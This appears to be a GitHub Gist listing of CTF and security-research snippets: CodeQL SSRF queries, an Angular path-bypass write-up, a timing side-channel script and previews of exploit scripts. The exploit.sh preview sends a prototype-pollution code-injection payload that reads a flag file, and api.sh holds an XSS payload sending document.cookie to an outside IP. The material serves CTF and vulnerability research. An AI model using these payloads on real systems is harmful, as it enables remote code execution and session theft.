Skip to content

Instantly share code, notes, and snippets.

View fuz-scroll.js
// create viewer element
init = () => {
const renderer = document.querySelector('#renderer')
const viewer = document.createElement('div')
viewer.style = `
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
View ssrf2.ql
import javascript
import DataFlow
import DataFlow::PathGraph
class SSRFConfiguration extends TaintTracking::Configuration {
SSRFConfiguration() { this = "SSRFConfiguration" }
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::SourceNode req |
isHTTPRequest(req) and
View test.ql
import javascript
import DataFlow::PathGraph
// TODO: need to add constraint of "@nguniversal/express-engine"
class Configuration extends TaintTracking::Configuration {
Configuration() { this = "Angular SSRF" }
// string not start with https?:// or //
override predicate isSource(DataFlow::Node source) {
source.getStringValue().regexpMatch("^(?!(https?:|//)).*$")
View angular-of-universe.md

flag 1 (Bypass path restriction with Angular router)

If you can render /debug/answer in server-side, you can get the first flag.

Nginx denies accesses to /debug.

  location /debug {
    # IP address restriction.
    # TODO: add allowed IP addresses here
View exploit.sh
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}'
View gist:6cedcff95fa3afcb06963dffef57c542
<script>
setTimeout(() => {
(new Image()).src='/start';
var start = performance.now();
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", {
mode: "no-cors",
credentials: "include"
}).then((response) => {
var end = performance.now();
View hugo-export-with-wp-syntax.diff
1a2
>
222,223d222
< do_action('wp_print_scripts');
<
225,228d223
<
< # remove theCode
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content);
<
View api.sh
#!/usr/local/bin/zsh
command=(
#cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q"
#header "Content*" "compressed"
header "HTTP/ 999 " "found"
#header "HTTP/0.9 " "OK"
#header "Connection" "close"
body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b
hello 1 1
View bruteforce.py
#!/usr/bin/env python3
import random
import sys
FLAG_LENGTH = 42
OPS_CURSOR = 0
RESULT_CURSOR = 0
TIME = 157763354